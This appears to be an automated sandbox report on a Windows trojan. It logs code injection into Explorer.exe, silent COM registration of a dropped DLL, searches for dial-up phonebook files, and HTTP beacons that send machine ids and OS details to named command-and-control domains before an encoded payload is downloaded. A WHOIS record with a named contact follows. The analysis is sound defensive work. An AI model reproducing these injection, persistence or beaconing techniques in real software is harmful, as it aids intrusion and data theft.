Target PID: (1256) Open Process - Filename (C:\WINDOWS\Explorer.EXE) Target PID: (1508) System Info: Get System Directory Thread: Create Remote Thread - Target PID (1508) Thread ID (1580) Thread ID ($7C80ACD3) Parameter Address ($00DF0000) Creation Flags (CREATE_SUSPENDED) Process Stsrted: Filename: C:\WINDOWS\system32\regsvr32.exe /s C:\WINDOWS\system32\1831.dll Filesize: 11776 bytes MD5: 9709ead856a690333138ac40804f914e Start Reason: CreateProcess function call File System Activity: Open File: C:\WINDOWS\system32\1831.dll (OPEN_EXISTING) Registry Changes: HKEY_CLASSES_ROOT\IEHpr.Invoke.1 "" = Invoke Class HKEY_CLASSES_ROOT\IEHpr.Invoke.1\CLSID "" = {5FB8C5D4-929F-4870-89E2-7E3EE26EE701} HKEY_CLASSES_ROOT\IEHpr.Invoke "" = Invoke Class HKEY_CLASSES_ROOT\IEHpr.Invoke\CLSID "" = {5FB8C5D4-929F-4870-89E2-7E3EE26EE701} HKEY_CLASSES_ROOT\IEHpr.Invoke\CurVer "" = IEHpr.Invoke.1 HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701} "" = Invoke Class HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\ProgID "" = IEHpr.Invoke.1 HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\VersionIndependentProgID "" = IEHpr.Invoke HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\InprocServer32 "" = C:\WINDOWS\system32\1831.dll HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\InprocServer32 "ThreadingModel" = Apartment HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\TypeLib "" = {ABBF3E09-6453-43cc-BC46-879C5DC5CB07} HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0 "" = IEHpr 1.0 Type Library HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\FLAGS "" = 0 HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\0\win32 "" = C:\WINDOWS\system32\1831.dll HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\HELPDIR "" = C:\WINDOWS\system32\ HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370} "" = IInvoke HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid "" = {00020424-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid32 "" = {00020424-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "" = {ABBF3E09-6453-43CC-BC46-879C5DC5CB07} HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "Version" = 1.0 Registry Reads: HKEY_CLASSES_ROOT\.dll "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0 "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\FLAGS "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\0\win32 "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\HELPDIR "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370} "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid32 "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "Version" Process Started: Filename: C:\WINDOWS\Explorer.EXE Filesize: 1032192 bytes MD5: a0732187050030ae399b241436565e64 Start Reason: InjectedCode File System Activity: Open File: C:\WINDOWS\602384a2 (OPEN_EXISTING) Open File: C:\WINDOWS\9635-124-94 (OPEN_EXISTING) Open File: C:\WINDOWS\9735-124-94 (OPEN_EXISTING) Find File: C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk Find File: C:\WINDOWS\system32\Ras\*.pbk Open File: \\.\PIPE\lsarpc (OPEN_EXISTING) Get File Attributes: c:\autoexec.bat Flags: (SECURITY_ANONYMOUS) Open File: c:\autoexec.bat (OPEN_EXISTING) Find File: C:\Documents and Settings\Sandbox\Application Data\Microsoft\Network\Connections\Pbk\*.pbk Creates Mutex: RasPbFile System Info: Get System Directory Get Windows Directory Get Computer Name Process Started: Filename: C:\WINDOWS\system32\86a01.exe -i Filesize: 118784 bytes MD5: e3a84c700311f8ae35453a9f21c49720 Start Reason: CreateProcess function call Network Activity: HTTP Conversation: From SandBox:1035 to 60.217.234.138:80 - [343.boolans.com] Request: POST /ue000/38sw.e?uid=182424500012813521600397 Response: 200 "OK" Request: GET /list/2008-03-11/NO.y Response: 200 "OK" From SandBox:1036 to 219.148.34.7:80 - [110.770304123.cn] Request: POST /player/blog.updata?v=1.6.2.7&mid=c42aebc0c1d238cef55114fa2770db52&r1=0ff5aba1999384238a4c4249ea7d93ac&tm=2007-01-17 16:33:31&av=TD&os=Windows XP.2600 with Service Pack 2&uid=182424500012813521611131&cht=0 Response: 200 "OK" Unknown UDP Traffic: From SandBox:1025 to 192.168.0.1:53 State: Normal establishment and termination - Transferred outbound Bytes: 131 - Transferred inbound Bytes: 480 Unknown TCP Traffic: From SandBox:1038 to 60.217.234.138:80 State: Normal establishment and termination - Transferred outbound Bytes: 281 - Transferred inbound Bytes: 3661 Data sent: 4745 5420 2f6c 6973 742f 3230 3038 2d30 GET /list/2008-0 332d 3131 2f4e 4f2e 7920 4854 5450 2f31 3-11/NO.y HTTP/1 2e31 0d0a 4163 6365 7074 3a20 2a2f 2a0d .1..Accept: */*. 0a55 412d 4350 553a 2078 3836 0d0a 4163 .UA-CPU: x86..Ac 6365 7074 2d45 6e63 6f64 696e 673a 2067 cept-Encoding: g 7a69 702c 2064 6566 6c61 7465 0d0a 5573 zip, deflate..Us 6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c er-Agent: Mozill 612f 342e 3020 2863 6f6d 7061 7469 626c a/4.0 (compatibl 653b 204d 5349 4520 372e 303b 2057 696e e; MSIE 7.0; Win 646f 7773 204e 5420 352e 313b 202e 4e45 dows NT 5.1; .NE 5420 434c 5220 312e 312e 3433 3232 3b20 T CLR 1.1.4322; 2e4e 4554 2043 4c52 2032 2e30 2e35 3037 .NET CLR 2.0.507 3237 3b20 2e4e 4554 2043 4c52 2033 2e30 27; .NET CLR 3.0 2e30 3435 3036 2e33 303b 2049 6e66 6f50 .04506.30; InfoP 6174 682e 3129 0d0a 486f 7374 3a20 3334 ath.1)..Host: 34 332e 626f 6f6c 616e 732e 636f 6d0d 0a43 3.boolans.com..C 6f6e 6e65 6374 696f 6e3a 204b 6565 702d onnection: Keep- 416c 6976 650d 0a0d 0a Alive.... Data received: 4854 5450 2f31 2e31 2032 3030 204f 4b0d HTTP/1.1 200 OK. 0a44 6174 653a 2054 7565 2c20 3131 204d .Date: Tue, 11 M 6172 2032 3030 3820 3033 3a33 383a 3432 ar 2008 03:38:42 2047 4d54 0d0a 5365 7276 6572 3a20 4170 GMT..Server: Ap 6163 6865 0d0a 4c61 7374 2d4d 6f64 6966 ache..Last-Modif 6965 643a 2054 7565 2c20 3131 204d 6172 ied: Tue, 11 Mar 2032 3030 3820 3033 3a33 383a 3432 2047 2008 03:38:42 G 4d54 0d0a 4554 6167 3a20 572f 2231 3738 MT..ETag: W/"178 6362 652d 6435 662d 3765 6437 3433 3830 cbe-d5f-7ed74380 220d 0a41 6363 6570 742d 5261 6e67 6573 "..Accept-Ranges 3a20 6279 7465 730d 0a43 6f6e 7465 6e74 : bytes..Content 2d4c 656e 6774 683a 2033 3432 330d 0a43 -Length: 3423..C 6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365 onnection: close 0d0a 436f 6e74 656e 742d 5479 7065 3a20 ..Content-Type: 7465 7874 2f70 6c61 696e 0d0a 0d0a text/plain.... Data received: 4c4b 0100 0000 0100 2c18 0d00 00f7 4c00 LK......,.....L. 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0200 0000 b1b0 cdcf cfc7 d2cf cdd2 cece ................ dfce cdc5 cecf c5cf c9ff 180d 0000 f74c ...............L 0000 2c3f 0d00 0000 5d00 0080 00f7 4c00 ..,?....].....L. 0000 0000 0000 2d98 4886 b95f ef80 c572 ......-.H.._...r a2f5 45db 15bf 63e9 4cf4 e924 1c57 ba01 ..E...c.L..$.W.. 2b6e e02e 9a75 e60f 29ca c6a5 23f7 f1b3 +n...u..)...#... 9044 709a 36db 4390 be12 415e 72b8 8f10 .Dp.6.C...A^r... 1917 9db9 2acf 7a9b 0ab1 5ae5 4b25 ce8a ....*.z...Z.K%.. 8472 89c4 9db4 d88e d147 bfd5 8c2e f5a2 .r.......G...... 8f46 a126 3d00 ba70 af02 f5e5 340f a44e .F.&=..p....4..N fa53 c584 af3d 1ed7 5607 767f d7ff e269 .S...=..V.v....i 0a09 83d2 0c48 46d8 12c3 24ea 13cb f474 .....HF...$....t cd04 1ac4 f5d1 0d43 3bf1 190e 3ed6 7cde .......C;...>.|. afbc b9be 78fb fa58 1ca4 7f38 f3cf b389 ....x..X...8.... ca94 4cbb 5ee5 041d 6897 d838 c5e5 656d ..L.^...h..8..em 946f 4646 5215 04a6 8891 e67e 91e0 b0d7 .oFFR......~.... ac6f e0d5 1358 facc 10ec 7e14 f20e 8d84 .o...X....~..... 459e 0163 cb0a d233 e49d db28 2cb6 7ca0 E..c...3...(,.|. aa8e c9f6 59ba 1f69 5f0c 1e20 e938 a3ff ....Y..i_.. .8.. 4135 c958 623f 1aaa 8eb8 8ff9 e2af 4006 A5.Xb?........@. 9472 b0f0 3599 164a 2b9b 373e 4d40 535a .r..5..J+.7>M@SZ fff0 d124 b13c 7240 4a41 20e9 626d 4989 ...$._.!..._X..]?.. 95b2 6c18 708c 5fb3 b85b 9939 7d29 7d84 ..l.p._..[.9})}. a418 fc40 5f88 15e4 0f84 7165 190b c0fc ...@_.....qe.... 0e2c d4c9 eaf9 d791 db84 e2b0 9178 9873 .,...........x.s 2f5a dc73 5737 d71f 66d6 5a5a 4ee2 53c0 /Z.sW7..f.ZZN.S. 361b f30c 7bc1 e104 3322 a62d 71e3 3495 6...{...3".-q.4. 0bbc b649 7f31 a490 ac92 086f 3e8d b885 ...I.1.....o>... 9d0c 7a14 d896 c8ae f45e 35ff 0761 a6d5 ..z......^5..a.. b4fe da56 f6ac 351d 7f21 74c5 cc08 d5b2 ...V..5..!t..... 92fc a3c8 a332 bdd8 d745 a579 a00a 4270 .....2...E.y..Bp d5ed 399b 40d9 2f80 19cd cd81 5b45 bb6b ..9.@./.....[E.k d448 1353 0a77 0a1b 27e3 75a2 0d21 ce08 .H.S.w..'.u..!.. d610 f82d 057e e0ca 9b23 3df4 6d20 e10d ...-.~...#=.m .. 2140 877c 11a9 4dfd 49a3 e480 5fa8 19b9 !@.|..M.I..._... 1cfe 853d 9df9 cbdf 055f 7089 eb41 16be ...=....._p..A.. c92b 6b2d 1cb1 2712 1f08 86b0 081f 43a3 .+k-..'.......C. 19f0 579f b93e 9098 af9f 7954 49cc 92e0 ..W..>....yTI... 4886 8694 e937 028f 6fd4 821b 282f 90fe H....7..o...(/.. f524 f471 b729 dfda 09d2 056d 6c02 a4bd .$.q.).....ml... e747 895c 0ff4 ec3d f1de ac01 78cc 0e0d .G.\...=....x... 9607 fe6f 286c aa35 ab83 66b9 6ce9 1a9c ...o(l.5..f.l... 4db3 f0a7 edfc 4ae6 5f1e 7914 0e12 f29d M.....J._.y..... be31 a472 55f8 7e59 0598 79ce 6071 1a71 .1.rU.~Y..y.`q.q 12eb ec92 3ea9 1474 d771 be35 9988 2f73 ....>..t.q.5../s 8c5c feb5 a09f 1d95 b7ec 5cbe 14a9 401c .\........\...@. f95f ad70 e222 597f 84f0 4bde d13f 17db ._.p."Y...K..?.. 22ce e2e2 00f3 10ca 0d52 5555 6e25 a9a7 "........RUUn%.. 3700 cc1b a7a5 09f0 f650 1279 0a86 202b 7........P.y.. + 50ac 327e cdf3 6e1c d9ab 7b2b fc7e d943 P.2~..n...{+.~.C 193e 7656 2ec9 fc4e b42e 8bf6 b7cb ce8d .>vV...N........ dc6b ebce 7a6d 803b 832d ff2e 50a5 6985 .k..zm.;.-..P.i. 0627 5158 a55a 7123 67be e441 ce84 8a6b .'QX.Zq#g..A...k e571 1fc9 c53f 1c33 2387 e60b 2b6a fa70 .q...?.3#...+j.p d3ca b9d2 a6a1 d8f6 582f 2b5c ca25 f01c ........X/+\.%.. b94e 8a7a cdbc 6763 0392 c73c 8a3b c789 .N.z..gc...<.;.. 9ffe 2a3f 0aed 9155 608b 3c1b c602 7b38 ..*?...U`.<...{8 aa92 af7b a336 cf2f d9f9 412b f90c bc6c ...{.6./..A+...l 6084 83a6 a816 1de3 d7c1 0260 1ca2 5ff8 `..........`.._. 0b86 6133 92fe 85a9 5373 a340 ccd3 c5d6 ..a3....Ss.@.... 0b19 d673 a673 cf09 6c8f 0192 8d02 bfe2 ...s.s..l....... 4c87 da02 42e3 8e0b fa35 2b26 413b c593 L...B....5+&A;.. 3027 1622 15e2 52c0 0f60 41ca ea63 8067 0'."..R..`A..c.g 2448 cdcd e164 afa0 dd80 61ef 7fa6 96b8 $H...d....a..... 9681 172b f6a9 799d d4f4 fab4 cafd c068 ...+..y........h ccf6 3ea4 8969 407c 8ade 75d6 54fc 46ec ..>..i@|..u.T.F. f199 1aa9 0b11 a0c8 dd03 e22d 71d3 5975 ...........-q.Yu 1fe9 8ada 7365 66b6 dc01 4808 25b0 0a55 ....sef...H.%..U 321a 771b 99c2 3e61 e85e db5f d2be 17ab 2.w...>a.^._.... 6c11 8aff 0d58 e210 cce0 ca0f 56a6 0cd0 l....X......V... 466b 8f18 Fk.. Data received: e789 936e fcfb ffed b575 f813 cf99 5090 ...n.....u....P. 2b8b 19f8 760d ed9a 754c 7482 670b bf17 +...v...uLt.g... d393 9ba8 0281 bbe2 3438 b882 4666 6052 ........48..Ff`R 18fe ce6a 58eb b0ac 0dff 2120 9430 6197 ...jX.....! .0a. 7e19 a10b 4561 304f 9d4f 2308 cd69 917f ~...Ea0O.O#..i.. 3d82 4935 aebc b3bc ba01 a599 5808 9132 =.I5........X..2 fa99 8d13 6974 8008 a0f7 9e10 d99d ae09 ....it.......... e0ac f026 07f2 521b 57c5 d02b 8e67 062a ...&..R.W..+.g.* bac1 c2bf ecac 4687 3fe5 df05 6664 ae5a ......F.?...fd.Z 4d8b c1a7 df09 f5d5 0912 5073 6944 2ad0 M.........PsiD*. 2c9d a908 2462 65c0 cda5 5756 f94d 3df3 ,...$be...WV.M=. f446 3fa6 1a49 10c0 aacd 3430 ee40 ec4d .F?..I....40.@.M fa8d b51e 7a84 2ee2 0fd1 ef5a f38b 8622 ....z......Z..." df9d ae47 8244 4d99 0753 67bd 7909 4a48 ...G.DM..Sg.y.JH bdbe 44b4 fc36 9a23 db8e ae8b 6b00 4185 ..D..6.#....k.A. 082b fd45 1893 d225 e9db 7a93 2318 464c .+.E...%..z.#.FL d9f8 57da 2e5d ff2d 7b03 d0eb bb9e 69f1 ..W..].-{.....i. deb3 93eb 8440 75d4 ebcd 6955 8c18 0c3d .....@u...iU...= 6210 1784 c04e 2399 eb53 9155 1651 46cb b....N#..S.U.QF. d3cb fc2e 6563 b7ca d5d5 e63d 6638 4a2c ....ec.....=f8J, a5b6 d2f6 5710 5a7c 5860 2ebe b4ec aed8 ....W.Z|X`...... c17b ebeb 29c6 c38d c0be 136d 0fc8 1e7e .{..)......m...~ 4388 7aa8 8771 bbb8 09ef 9ba6 9dc1 8c90 C.z..q.......... c907 3b1a cfa2 6bc9 c38b e1c8 6f48 bd64 ..;...k.....oH.d 682c 0704 3eba c4bc 3dbc 8eac 43d7 2e85 h,..>...=...C... 980e 1439 7dcd 06a5 0e54 d262 d248 873e ...9}....T.b.H.> 05f1 cb3b 757b 34a1 ff85 e3c9 6861 7671 ...;u{4.....havq fa71 0e1b 48e7 1d64 43e6 09bc f3a4 e9a9 .q..H..dC....... 9e82 cf5b c305 0ec4 b42b 6e69 7bea 58f3 ...[.....+ni{.X. b85b caec da26 5987 18b7 6503 8fe3 bdca .[...&Y...e..... e50a 5268 19b0 9ff0 8f97 6950 1c63 b4f3 ..Rh......iP.c.. 795f 001f 98a9 4718 654c 6548 60aa 418f y_....G.eLeH`.A. e2aa ab33 c363 34eb 309f f708 6820 7e86 ...3.c4.0...h ~. b3f9 0985 856e d561 4d22 ca1d 00e0 9fd1 .....n.aM"...... fbcd 579f 27c9 e68c 47ec 9bf5 a62b ba8c ..W.'...G....+.. 1b8a cd14 440c c164 bcda b4c3 11a1 b742 ....D..d.......B 1345 9da1 1709 ca42 dd52 825e 343b 09e5 .E.....B.R.^4;.. 14e5 a5f3 f8bb 5b92 9848 b9ba 5a5c e4c6 ......[..H..Z\.. 0ac2 0658 6c5e dba5 706b ef45 b0c2 55f3 ...Xl^..pk.E..U. 1dca cd23 7ff4 8ac3 50c8 9385 0914 a6aa ...#....P....... 920c 0c6b 385c 5938 cc0a 2396 4230 bb71 ...k8\Y8..#.B0.q 406d a787 c35e d10e 1dd9 dfba 34d4 3f09 @m...^......4.?. 5e1b e1ab e33c fd18 8dfb 9827 7d26 21da ^....<.....'}&!. e4da 89ed 9424 29a9 2c47 8eab a782 10c8 .....$).,G...... c8f7 8f57 3a2d 12e1 6583 52be 2cea acf8 ...W:-..e.R.,... 27cc 05ca e829 b8cc 7476 87e6 33d5 9fc2 '....)..tv..3... b54b 3885 1624 4d63 eb93 0953 bbdb 29c7 .K8..$Mc...S..). 07c8 4fe2 21dc 84a1 3233 72f4 1f3c 5481 ..O.!...23r..o.9 e65d 7086 dc19 d4f3 1832 e964 e705 ad57 .]p......2.d...W 549e 0863 ed9d a3f6 cfcb cb00 dcde 8765 T..c...........e 2ea5 4ea7 6af6 a6ba 9f2b c036 d590 3997 ..N.j....+.6..9. d975 ce5e b65b 22e8 e6a7 b96c 7ac1 304a .u.^.["....lz.0J d5bf 3177 c6c9 053e 8734 7f49 201d 1abb ..1w...>.4.I ... d339 9fdd 8825 527c 6d40 2b6f 8288 8ce7 .9...%R|m@+o.... ca77 7a1e 49a9 2653 7c66 03a8 0a40 4d34 .wz.I.&S|f...@M4 c3c2 186d 2d09 d341 d1ed e0b6 4a37 669d ...m-..A....J7f. 43f6 f0eb cdb3 730c 1ac9 0fe7 d519 8fe3 C.....s......... 4e3d 6183 1492 d1dd 97a9 f0cf 329f eb0d N=a.........2... 572e 12ef fc1b dd47 9b2c df1d a76b 856a W......G.,...k.j 1126 0601 7ba5 e6eb 10f6 562f fdc3 cb54 .&..{.....V/...T 8a6d fd45 70a9 1f2b ec0f 55d9 b3c0 956e .m.Ep..+..U....n a01f 1665 77ea 9b49 3002 9ba9 bbad 7071 ...ew..I0.....pq 7595 bbf9 6f11 c3fb 5246 a410 e531 9ab5 u...o...RF...1.. 4b86 5aa7 d7ea 4e69 7586 2eaa 49ab ee06 K.Z...Niu...I... 3e21 9c7a e64c d1f4 2ef4 4f0f 7930 09ab >!.z.L....O.y0.. e86e f9cf e865 46bf fff9 0a2e 1eab c51f .n...eF......... 0d44 086e f24e d1bc 10c4 64db 7fae 2b13 .D.n.N....d...+. 2472 60a6 ee20 7c66 aad8 a6f8 b825 5abd $r`.. |f.....%Z. 3061 5712 5db1 6113 9705 5ff1 786d 4d92 0aW.].a..._.xmM. 7ddf 2052 b749 2390 0f34 842f 8bf3 ac43 }. R.I#..4./...C 4969 b8ee 30ba cc60 7209 f571 1e06 ac74 Ii..0..`r..q...t 223e 931e b9f4 33e9 29d7 6723 c210 2116 ">....3.).g#..!. 66cd 77e2 4551 0356 bba3 cf6e 797a 3ed8 f.w.EQ.V...nyz>. 32d1 a551 92d0 fa7b b75b 76cd 123e 042f 2..Q...{.[v..>./ c9ea affc 447c 2479 4dfe ef29 4f9d f4ff ....D|$yM..)O... d2e7 758d 8ea9 aed9 8ce7 b87f 33a5 69a9 ..u.........3.i. 78d4 2ac2 x.*. Data received: 6b46 f747 4983 244f d049 a9e8 e698 df99 kF.GI.$O.I...... 902a faa6 a51a 9daf e690 ed1f 2835 7760 .*..........(5w` 2993 4b42 728f 5353 3d02 d92c 38c5 d1a8 ).KBr.SS=..,8... 12d3 22cd 421f 523d f305 25da d285 0dc8 ..".B.R=..%..... bd78 68ee 5ab1 7fbe 3ef1 e49c 1919 7cd2 .xh.Z...>.....|. d159 e3c0 7081 51e1 fa0b 7bcb 8259 2ff5 .Y..p.Q...{..Y/. bcd9 4296 5cdd b032 feca 3d35 e53b 1a9b ..B.\..2..=5.;.. 322a 5165 e3a6 1190 4954 3c4b 21d8 8754 2*Qe....IT<\.j}l].E..C 7895 1a0c 855f b9e1 5bc1 b58e 4507 a8c5 x...._..[...E... 8598 f2f0 8f2d fbe3 343a 3710 5ae1 fd85 .....-..4:7.Z... 7303 a878 c9b1 e333 172a fe30 0baf 3ebc s..x...3.*.0..>. 26de efab 83b0 f1f1 8193 d937 8908 f989 &..........7.... 2194 8102 806d 28f9 482f e81f 09cc 2688 !....m(.H/....&. eecd e195 6fdd 838b bbda f251 a7ec 397b ....o......Q..9{ 3697 e556 deb8 69fb e04c fb44 cdc9 eece 6..V..i..L.D.... 535a e426 54e7 8777 dc48 3c03 5023 58a3 SZ.&T..w.H<.P#X. 1171 49ba bc30 2bc3 6579 a735 f7f7 bee9 .qI..0+.ey.5.... 49f4 8af2 9626 ba44 8ccd 4876 945f 6733 I....&.D..Hv._g3 2551 1513 49d0 8ebd 5733 3f90 bfaa d31c %Q..I...W3?..... b4e5 59a7 5d7b ef69 b10c ab3e 9185 bde7 ..Y.]{.i...>.... 0686 18c0 95d0 a0 ....... TCP Connection Attempt: From SandBox:1038 to 60.217.234.138:80 WHOIS - 60.217.234.138 Location: China [City: ] inetnum: 60.208.0.0 - 60.217.255.255 netname: CNCGROUP-SD descr: CNCGROUP Shandong province network descr: China Network Communications Group Corporation descr: No.156,Fu-Xing-Men-Nei Street, descr: Beijing 100031 country: CN admin-c: CH455-AP tech-c: XZ14-AP mnt-by: APNIC-HM mnt-lower: MAINT-CNCGROUP-SD mnt-routes: MAINT-CNCGROUP-RR status: ALLOCATED PORTABLE remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+ remarks: This object can only be updated by APNIC hostmasters. remarks: To update this object, please contact APNIC remarks: hostmasters and include your organisation's account remarks: name in the subject line. remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+ changed: **********@apnic.net 20040705 changed: **********@apnic.net 20060125 source: APNIC route: 60.216.0.0/15 descr: CNC Group CHINA169 Shandong Province Network country: CN origin: AS4837 mnt-by: MAINT-CNCGROUP-RR changed: *****@cnc-noc.net 20060118 source: APNIC role: CNCGroup Hostmaster e-mail: *****@cnc-noc.net address: No.156,Fu-Xing-Men-Nei Street, address: Beijing,100031,P.R.China nic-hdl: CH455-AP phone: +86-10-82993155 fax-no: +86-10-82993102 country: CN admin-c: CH444-AP tech-c: CH444-AP changed: *****@cnc-noc.net 20041119 mnt-by: MAINT-CNCGROUP source: APNIC person: XIAOFENG ZHANG nic-hdl: XZ14-AP e-mail: **@pub.sd.cninfo.net address: Jinan,Shandong P.R China phone: +86-531-6666666 fax-no: +86-531-6666666 country: CN changed: **@sdinfo.net 20050330 mnt-by: MAINT-ZXF source: APNIC